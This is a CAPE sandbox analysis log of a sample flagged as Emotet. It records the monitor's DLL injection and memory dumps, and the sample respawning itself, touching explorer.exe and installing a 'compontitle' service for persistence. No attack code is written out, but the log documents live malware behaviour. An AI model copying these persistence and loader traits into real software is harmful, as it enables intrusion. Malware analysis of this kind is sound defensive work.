CAPE

Detections: Emotet Triggered CAPE Tasks: Task #115358: Extraction


Analysis

Category Package Started Completed Duration Options Log
FILE exe 2019-12-03 05:50:30 2019-12-03 05:55:13 283 seconds Show Options Show Log
route = internet
procdump = 1
2019-12-03 05:50:41,000 [root] INFO: Date set to: 12-03-19, time set to: 05:50:41, timeout set to: 200
2019-12-03 05:50:41,155 [root] DEBUG: Starting analyzer from: C:\ilkkxkodz
2019-12-03 05:50:41,155 [root] DEBUG: Storing results at: C:\HBzTSUSYC
2019-12-03 05:50:41,155 [root] DEBUG: Pipe server name: \\.\PIPE\QmTuKfWf
2019-12-03 05:50:41,155 [root] INFO: Analysis package "exe" has been specified.
2019-12-03 05:50:51,374 [root] DEBUG: Started auxiliary module Browser
2019-12-03 05:50:51,374 [root] DEBUG: Started auxiliary module Curtain
2019-12-03 05:50:51,388 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2019-12-03 05:50:55,444 [modules.auxiliary.digisig] DEBUG: File is not signed.
2019-12-03 05:50:55,444 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2019-12-03 05:50:55,460 [root] DEBUG: Started auxiliary module DigiSig
2019-12-03 05:50:55,460 [root] DEBUG: Started auxiliary module Disguise
2019-12-03 05:50:55,460 [root] DEBUG: Started auxiliary module Human
2019-12-03 05:50:55,476 [root] DEBUG: Started auxiliary module Screenshots
2019-12-03 05:50:55,476 [root] DEBUG: Started auxiliary module Sysmon
2019-12-03 05:50:55,476 [root] DEBUG: Started auxiliary module Usage
2019-12-03 05:50:55,476 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2019-12-03 05:50:55,476 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2019-12-03 05:50:55,507 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\nonmanual.exe" with arguments "" with pid 1952
2019-12-03 05:50:55,507 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-12-03 05:50:55,507 [lib.api.process] INFO: 32-bit DLL to inject is C:\ilkkxkodz\dll\yyOUvNPt.dll, loader C:\ilkkxkodz\bin\RxcDDQh.exe
2019-12-03 05:50:55,539 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\QmTuKfWf.
2019-12-03 05:50:55,539 [root] DEBUG: Loader: Injecting process 1952 (thread 1752) with C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:50:55,539 [root] DEBUG: Process image base: 0x00400000
2019-12-03 05:50:55,539 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:50:55,539 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00451000 - 0x77680000
2019-12-03 05:50:55,539 [root] DEBUG: InjectDllViaIAT: Allocated 0xf60 bytes for new import table at 0x00460000.
2019-12-03 05:50:55,539 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-12-03 05:50:55,539 [root] DEBUG: Successfully injected DLL C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:50:55,539 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1952
2019-12-03 05:50:57,878 [lib.api.process] INFO: Successfully resumed process with pid 1952
2019-12-03 05:50:58,690 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-12-03 05:50:58,706 [root] INFO: Added new process to list with pid: 1952
2019-12-03 05:50:58,752 [root] DEBUG: Process dumps enabled.
2019-12-03 05:50:59,017 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-12-03 05:50:59,032 [root] INFO: Disabling sleep skipping.
2019-12-03 05:50:59,032 [root] INFO: Disabling sleep skipping.
2019-12-03 05:50:59,032 [root] INFO: Disabling sleep skipping.
2019-12-03 05:50:59,032 [root] INFO: Disabling sleep skipping.
2019-12-03 05:50:59,032 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 1952 at 0x74b50000, image base 0x400000, stack from 0x286000-0x290000
2019-12-03 05:50:59,049 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\nonmanual.exe".
2019-12-03 05:50:59,049 [root] INFO: Monitor successfully loaded in process with pid 1952.
2019-12-03 05:50:59,673 [root] DEBUG: DLL loaded at 0x751D0000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-12-03 05:50:59,687 [root] DEBUG: DLL loaded at 0x75190000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-12-03 05:50:59,687 [root] DEBUG: DLL loaded at 0x74B30000: C:\Windows\system32\USERENV (0x17000 bytes).
2019-12-03 05:50:59,687 [root] DEBUG: DLL loaded at 0x74D70000: C:\Windows\system32\profapi (0xb000 bytes).
2019-12-03 05:50:59,703 [root] DEBUG: DLL loaded at 0x75D80000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-12-03 05:50:59,720 [root] DEBUG: DLL loaded at 0x758C0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-12-03 05:51:00,155 [root] DEBUG: set_caller_info: Adding region at 0x00350000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-12-03 05:51:00,171 [root] DEBUG: set_caller_info: Adding region at 0x004F0000 to caller regions list (ntdll::memcpy).
2019-12-03 05:51:00,296 [root] INFO: Announced 32-bit process name: nonmanual.exe pid: 1272
2019-12-03 05:51:00,312 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-12-03 05:51:00,312 [lib.api.process] INFO: 32-bit DLL to inject is C:\ilkkxkodz\dll\yyOUvNPt.dll, loader C:\ilkkxkodz\bin\RxcDDQh.exe
2019-12-03 05:51:00,328 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\QmTuKfWf.
2019-12-03 05:51:00,328 [root] DEBUG: Loader: Injecting process 1272 (thread 1924) with C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:00,328 [root] DEBUG: Process image base: 0x00400000
2019-12-03 05:51:00,328 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:00,344 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00451000 - 0x77680000
2019-12-03 05:51:00,344 [root] DEBUG: InjectDllViaIAT: Allocated 0xf60 bytes for new import table at 0x00460000.
2019-12-03 05:51:00,344 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-12-03 05:51:00,344 [root] DEBUG: Successfully injected DLL C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:00,358 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1272
2019-12-03 05:51:00,358 [root] DEBUG: DLL loaded at 0x74DC0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-12-03 05:51:00,390 [root] DEBUG: DLL unloaded from 0x00400000.
2019-12-03 05:51:00,405 [root] INFO: Announced 32-bit process name: nonmanual.exe pid: 1272
2019-12-03 05:51:00,405 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-12-03 05:51:00,405 [lib.api.process] INFO: 32-bit DLL to inject is C:\ilkkxkodz\dll\yyOUvNPt.dll, loader C:\ilkkxkodz\bin\RxcDDQh.exe
2019-12-03 05:51:00,421 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\QmTuKfWf.
2019-12-03 05:51:00,421 [root] DEBUG: Loader: Injecting process 1272 (thread 1924) with C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:00,421 [root] DEBUG: Process image base: 0x00400000
2019-12-03 05:51:00,421 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:00,421 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-12-03 05:51:00,421 [root] DEBUG: Successfully injected DLL C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:00,437 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1272
2019-12-03 05:51:00,437 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1952
2019-12-03 05:51:00,437 [root] DEBUG: GetHookCallerBase: thread 1752 (handle 0x0), return address 0x004FCA51, allocation base 0x004F0000.
2019-12-03 05:51:00,437 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-12-03 05:51:00,437 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-12-03 05:51:00,437 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-12-03 05:51:00,453 [root] DEBUG: DumpProcess: Module entry point VA is 0x000014E0.
2019-12-03 05:51:00,453 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-12-03 05:51:00,453 [root] DEBUG: Process dumps enabled.
2019-12-03 05:51:00,467 [root] INFO: Disabling sleep skipping.
2019-12-03 05:51:00,483 [root] INFO: Added new CAPE file to list with path: C:\HBzTSUSYC\CAPE\1952_19891943380111432122019
2019-12-03 05:51:00,483 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x46a00.
2019-12-03 05:51:00,483 [root] DEBUG: DumpInterestingRegions: Dumping calling region at 0x004F0000.
2019-12-03 05:51:00,483 [root] DEBUG: DumpImageInCurrentProcess: Disguised PE image (bad MZ and/or PE headers) at 0x004F0000
2019-12-03 05:51:00,483 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-12-03 05:51:00,500 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-12-03 05:51:00,500 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 1272 at 0x74b50000, image base 0x400000, stack from 0x286000-0x290000
2019-12-03 05:51:00,500 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x004F0000.
2019-12-03 05:51:00,500 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\--f4134209.
2019-12-03 05:51:00,500 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000C983.
2019-12-03 05:51:00,500 [root] INFO: Added new process to list with pid: 1272
2019-12-03 05:51:00,515 [root] INFO: Monitor successfully loaded in process with pid 1272.
2019-12-03 05:51:00,530 [root] INFO: Added new CAPE file to list with path: C:\HBzTSUSYC\CAPE\1952_5990066460111432122019
2019-12-03 05:51:00,530 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x10000.
2019-12-03 05:51:00,546 [root] DEBUG: DLL unloaded from 0x75D20000.
2019-12-03 05:51:00,546 [root] INFO: Notified of termination of process with pid 1952.
2019-12-03 05:51:00,779 [root] DEBUG: DLL loaded at 0x751D0000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-12-03 05:51:00,826 [root] DEBUG: DLL loaded at 0x75190000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-12-03 05:51:00,904 [root] DEBUG: DLL loaded at 0x74B10000: C:\Windows\system32\USERENV (0x17000 bytes).
2019-12-03 05:51:00,921 [root] DEBUG: DLL loaded at 0x74B40000: C:\Windows\system32\profapi (0xb000 bytes).
2019-12-03 05:51:00,936 [root] DEBUG: set_caller_info: Adding region at 0x00510000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-12-03 05:51:00,967 [root] DEBUG: set_caller_info: Adding region at 0x00520000 to caller regions list (ntdll::memcpy).
2019-12-03 05:51:08,283 [root] DEBUG: DLL loaded at 0x75FF0000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-12-03 05:51:08,315 [root] DEBUG: DLL loaded at 0x74970000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-12-03 05:51:08,331 [root] DEBUG: DLL loaded at 0x75B30000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-12-03 05:51:08,345 [root] DEBUG: DLL loaded at 0x74870000: C:\Windows\system32\propsys (0xf5000 bytes).
2019-12-03 05:51:08,440 [root] DEBUG: DLL loaded at 0x75420000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-12-03 05:51:08,470 [root] DEBUG: DLL loaded at 0x75670000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-12-03 05:51:08,486 [root] DEBUG: DLL loaded at 0x756A0000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-12-03 05:51:08,486 [root] DEBUG: DLL loaded at 0x74C10000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-12-03 05:51:08,486 [root] DEBUG: DLL loaded at 0x76240000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-12-03 05:51:08,517 [root] DEBUG: DLL unloaded from 0x76430000.
2019-12-03 05:51:08,782 [root] INFO: Announced 64-bit process name: explorer.exe pid: 1676
2019-12-03 05:51:08,813 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-12-03 05:51:08,813 [lib.api.process] INFO: 64-bit DLL to inject is C:\ilkkxkodz\dll\opQXCqc.dll, loader C:\ilkkxkodz\bin\rntRXAvE.exe
2019-12-03 05:51:08,829 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\QmTuKfWf.
2019-12-03 05:51:08,845 [root] DEBUG: Loader: Injecting process 1676 (thread 0) with C:\ilkkxkodz\dll\opQXCqc.dll.
2019-12-03 05:51:08,845 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 1680, handle 0x84
2019-12-03 05:51:08,861 [root] DEBUG: Process image base: 0x00000000FF270000
2019-12-03 05:51:08,861 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2019-12-03 05:51:08,891 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2019-12-03 05:51:08,907 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-12-03 05:51:08,907 [root] DEBUG: Process dumps enabled.
2019-12-03 05:51:08,938 [root] INFO: Disabling sleep skipping.
2019-12-03 05:51:09,125 [root] WARNING: Unable to place hook on LockResource
2019-12-03 05:51:09,125 [root] WARNING: Unable to hook LockResource
2019-12-03 05:51:09,328 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1676 at 0x0000000074790000, image base 0x00000000FF270000, stack from 0x0000000006BA2000-0x0000000006BB0000
2019-12-03 05:51:09,328 [root] DEBUG: Commandline: C:\Windows\explorer.exe.
2019-12-03 05:51:09,345 [root] INFO: Added new process to list with pid: 1676
2019-12-03 05:51:09,345 [root] INFO: Monitor successfully loaded in process with pid 1676.
2019-12-03 05:51:09,484 [root] DEBUG: set_caller_info: Adding region at 0x0000000074CD0000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-12-03 05:51:09,484 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-12-03 05:51:09,500 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-12-03 05:51:09,500 [root] DEBUG: Successfully injected DLL C:\ilkkxkodz\dll\opQXCqc.dll.
2019-12-03 05:51:09,703 [root] DEBUG: DLL unloaded from 0x74870000.
2019-12-03 05:51:09,719 [root] DEBUG: DLL loaded at 0x74B30000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2019-12-03 05:51:09,796 [root] DEBUG: DLL loaded at 0x74780000: C:\Windows\system32\mssprxy (0xc000 bytes).
2019-12-03 05:51:09,844 [root] DEBUG: DLL unloaded from 0x74780000.
2019-12-03 05:51:09,844 [root] DEBUG: DLL unloaded from 0x75F00000.
2019-12-03 05:51:09,859 [root] DEBUG: DLL unloaded from 0x76430000.
2019-12-03 05:51:10,171 [root] INFO: Announced starting service "compontitle"
2019-12-03 05:51:10,171 [root] INFO: Attaching to Service Control Manager (services.exe - pid 464)
2019-12-03 05:51:10,187 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-12-03 05:51:10,187 [lib.api.process] INFO: 64-bit DLL to inject is C:\ilkkxkodz\dll\opQXCqc.dll, loader C:\ilkkxkodz\bin\rntRXAvE.exe
2019-12-03 05:51:10,233 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\QmTuKfWf.
2019-12-03 05:51:10,233 [root] DEBUG: Loader: Injecting process 464 (thread 0) with C:\ilkkxkodz\dll\opQXCqc.dll.
2019-12-03 05:51:10,233 [root] DEBUG: InjectDll: No thread ID supplied, GetProcessInitialThreadId failed.
2019-12-03 05:51:10,250 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-12-03 05:51:10,250 [root] DEBUG: Process dumps enabled.
2019-12-03 05:51:10,265 [root] INFO: Disabling sleep skipping.
2019-12-03 05:51:10,280 [root] WARNING: Unable to place hook on LockResource
2019-12-03 05:51:10,280 [root] WARNING: Unable to hook LockResource
2019-12-03 05:51:10,312 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 464 at 0x0000000074790000, image base 0x00000000FFAB0000, stack from 0x0000000002896000-0x00000000028A0000
2019-12-03 05:51:10,312 [root] DEBUG: Commandline: C:\Windows\sysnative\services.exe.
2019-12-03 05:51:10,312 [root] INFO: Added new process to list with pid: 464
2019-12-03 05:51:10,328 [root] INFO: Monitor successfully loaded in process with pid 464.
2019-12-03 05:51:10,358 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-12-03 05:51:10,358 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-12-03 05:51:10,374 [root] DEBUG: Successfully injected DLL C:\ilkkxkodz\dll\opQXCqc.dll.
2019-12-03 05:51:11,966 [root] INFO: Announced 32-bit process name: compontitle.exe pid: 112
2019-12-03 05:51:11,966 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-12-03 05:51:11,966 [lib.api.process] INFO: 32-bit DLL to inject is C:\ilkkxkodz\dll\yyOUvNPt.dll, loader C:\ilkkxkodz\bin\RxcDDQh.exe
2019-12-03 05:51:13,852 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\QmTuKfWf.
2019-12-03 05:51:13,868 [root] DEBUG: Loader: Injecting process 112 (thread 2012) with C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:14,055 [root] DEBUG: Process image base: 0x00400000
2019-12-03 05:51:14,055 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:18,283 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00451000 - 0x77680000
2019-12-03 05:51:18,299 [root] DEBUG: InjectDllViaIAT: Allocated 0xf60 bytes for new import table at 0x00460000.
2019-12-03 05:51:25,990 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-12-03 05:51:25,990 [root] DEBUG: Successfully injected DLL C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:25,990 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 112
2019-12-03 05:51:32,183 [root] INFO: Announced 32-bit process name: compontitle.exe pid: 112
2019-12-03 05:51:32,183 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-12-03 05:51:32,183 [lib.api.process] INFO: 32-bit DLL to inject is C:\ilkkxkodz\dll\yyOUvNPt.dll, loader C:\ilkkxkodz\bin\RxcDDQh.exe
2019-12-03 05:51:33,088 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\QmTuKfWf.
2019-12-03 05:51:34,023 [root] DEBUG: Loader: Injecting process 112 (thread 2012) with C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:34,023 [root] DEBUG: Process image base: 0x00400000
2019-12-03 05:51:38,220 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF89A0000 to caller regions list (ntdll::NtDuplicateObject).
2019-12-03 05:51:38,266 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:38,266 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-12-03 05:51:38,313 [root] DEBUG: Successfully injected DLL C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:38,313 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF4520000 to caller regions list (ntdll::NtDuplicateObject).
2019-12-03 05:51:38,313 [root] DEBUG: DLL unloaded from 0x758D0000.
2019-12-03 05:51:38,313 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 112
2019-12-03 05:51:38,313 [root] DEBUG: DLL unloaded from 0x000007FEF36B0000.
2019-12-03 05:51:41,013 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF36B0000 to caller regions list (ntdll::NtClose).
2019-12-03 05:51:41,013 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-12-03 05:51:41,013 [root] DEBUG: DLL unloaded from 0x000007FEF5410000.
2019-12-03 05:51:41,028 [root] DEBUG: Process dumps enabled.
2019-12-03 05:51:41,028 [root] DEBUG: DLL unloaded from 0x000007FEF79E0000.
2019-12-03 05:51:41,043 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF79E0000 to caller regions list (ntdll::NtClose).
2019-12-03 05:51:41,043 [root] INFO: Disabling sleep skipping.
2019-12-03 05:51:41,075 [root] DEBUG: DLL unloaded from 0x000007FEFBF80000.
2019-12-03 05:51:41,075 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-12-03 05:51:41,075 [root] DEBUG: DLL unloaded from 0x000007FEF9DF0000.
2019-12-03 05:51:41,091 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 112 at 0x74b50000, image base 0x400000, stack from 0x286000-0x290000
2019-12-03 05:51:41,091 [root] DEBUG: Commandline: C:\Windows\System32\"C:\Windows\SysWOW64\compontitle.exe".
2019-12-03 05:51:41,105 [root] INFO: Added new process to list with pid: 112
2019-12-03 05:51:41,105 [root] INFO: Monitor successfully loaded in process with pid 112.
2019-12-03 05:51:41,105 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF9DF0000 to caller regions list (ntdll::NtFreeVirtualMemory).
2019-12-03 05:51:41,184 [root] DEBUG: DLL unloaded from 0x000007FEFA0D0000.
2019-12-03 05:51:41,216 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFA0D0000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-12-03 05:51:41,216 [root] DEBUG: DLL loaded at 0x751D0000: C:\Windows\SysWOW64\CRYPTSP (0x16000 bytes).
2019-12-03 05:51:41,246 [root] DEBUG: DLL unloaded from 0x000007FEFA6F0000.
2019-12-03 05:51:41,246 [root] DEBUG: DLL loaded at 0x75190000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-12-03 05:51:41,246 [root] DEBUG: DLL unloaded from 0x000007FEF9F00000.
2019-12-03 05:51:41,246 [root] DEBUG: DLL loaded at 0x74B40000: C:\Windows\SysWOW64\profapi (0xb000 bytes).
2019-12-03 05:51:41,262 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF9F00000 to caller regions list (ntdll::NtClose).
2019-12-03 05:51:41,262 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFA360000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-12-03 05:51:41,278 [root] DEBUG: DLL loaded at 0x75D80000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-12-03 05:51:41,278 [root] DEBUG: DLL unloaded from 0x000007FEF6370000.
2019-12-03 05:51:41,278 [root] DEBUG: DLL loaded at 0x758C0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-12-03 05:51:41,293 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF6370000 to caller regions list (ntdll::NtFreeVirtualMemory).
2019-12-03 05:51:41,339 [root] DEBUG: DLL unloaded from 0x000007FEF3840000.
2019-12-03 05:51:41,512 [root] DEBUG: set_caller_info: Adding region at 0x00A90000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-12-03 05:51:41,528 [root] DEBUG: set_caller_info: Adding region at 0x00AF0000 to caller regions list (ntdll::memcpy).
2019-12-03 05:51:41,542 [root] INFO: Announced 32-bit process name: compontitle.exe pid: 912
2019-12-03 05:51:41,559 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-12-03 05:51:41,559 [lib.api.process] INFO: 32-bit DLL to inject is C:\ilkkxkodz\dll\yyOUvNPt.dll, loader C:\ilkkxkodz\bin\RxcDDQh.exe
2019-12-03 05:51:41,605 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\QmTuKfWf.
2019-12-03 05:51:41,605 [root] DEBUG: Loader: Injecting process 912 (thread 1020) with C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:41,605 [root] DEBUG: Process image base: 0x00400000
2019-12-03 05:51:41,605 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:41,621 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00451000 - 0x77680000
2019-12-03 05:51:41,621 [root] DEBUG: InjectDllViaIAT: Allocated 0xf60 bytes for new import table at 0x00460000.
2019-12-03 05:51:41,637 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-12-03 05:51:41,637 [root] DEBUG: Successfully injected DLL C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:41,637 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 912
2019-12-03 05:51:41,637 [root] DEBUG: DLL unloaded from 0x00400000.
2019-12-03 05:51:41,637 [root] DEBUG: DLL loaded at 0x74DC0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-12-03 05:51:41,651 [root] INFO: Announced 32-bit process name: compontitle.exe pid: 912
2019-12-03 05:51:41,651 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-12-03 05:51:41,651 [lib.api.process] INFO: 32-bit DLL to inject is C:\ilkkxkodz\dll\yyOUvNPt.dll, loader C:\ilkkxkodz\bin\RxcDDQh.exe
2019-12-03 05:51:41,667 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\QmTuKfWf.
2019-12-03 05:51:41,667 [root] DEBUG: Loader: Injecting process 912 (thread 1020) with C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:41,667 [root] DEBUG: Process image base: 0x00400000
2019-12-03 05:51:41,667 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:41,667 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-12-03 05:51:41,684 [root] DEBUG: Successfully injected DLL C:\ilkkxkodz\dll\yyOUvNPt.dll.
2019-12-03 05:51:41,684 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 912
2019-12-03 05:51:41,684 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 112
2019-12-03 05:51:41,714 [root] DEBUG: GetHookCallerBase: thread 2012 (handle 0x0), return address 0x00AFCA51, allocation base 0x00AF0000.
2019-12-03 05:51:41,714 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-12-03 05:51:41,714 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-12-03 05:51:41,714 [root] DEBUG: Process dumps enabled.
2019-12-03 05:51:41,730 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-12-03 05:51:41,730 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-12-03 05:51:41,746 [root] INFO: Disabling sleep skipping.
2019-12-03 05:51:41,746 [root] DEBUG: DumpProcess: Module entry point VA is 0x000014E0.
2019-12-03 05:51:41,746 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-12-03 05:51:41,762 [root] INFO: Added new CAPE file to list with path: C:\HBzTSUSYC\CAPE\112_4406920052111432122019
2019-12-03 05:51:41,762 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 912 at 0x74b50000, image base 0x400000, stack from 0x286000-0x290000
2019-12-03 05:51:41,762 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x46a00.
2019-12-03 05:51:41,776 [root] DEBUG: Commandline: C:\Windows\System32\--ce2bae20.
2019-12-03 05:51:41,776 [root] DEBUG: DumpInterestingRegions: Dumping calling region at 0x00AF0000.
2019-12-03 05:51:41,792 [root] INFO: Added new process to list with pid: 912
2019-12-03 05:51:41,792 [root] DEBUG: DumpImageInCurrentProcess: Disguised PE image (bad MZ and/or PE headers) at 0x00AF0000
2019-12-03 05:51:41,792 [root] INFO: Monitor successfully loaded in process with pid 912.
2019-12-03 05:51:41,792 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-12-03 05:51:41,871 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00AF0000.
2019-12-03 05:51:41,901 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000C983.
2019-12-03 05:51:41,917 [root] DEBUG: DLL loaded at 0x751D0000: C:\Windows\SysWOW64\CRYPTSP (0x16000 bytes).
2019-12-03 05:51:41,933 [root] DEBUG: DLL loaded at 0x75190000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-12-03 05:51:41,933 [root] INFO: Added new CAPE file to list with path: C:\HBzTSUSYC\CAPE\112_3652987252111432122019
2019-12-03 05:51:41,933 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x10000.
2019-12-03 05:51:41,933 [root] DEBUG: DLL loaded at 0x74B40000: C:\Windows\SysWOW64\profapi (0xb000 bytes).
2019-12-03 05:51:41,948 [root] DEBUG: DLL unloaded from 0x75D20000.
2019-12-03 05:51:41,948 [root] INFO: Notified of termination of process with pid 112.
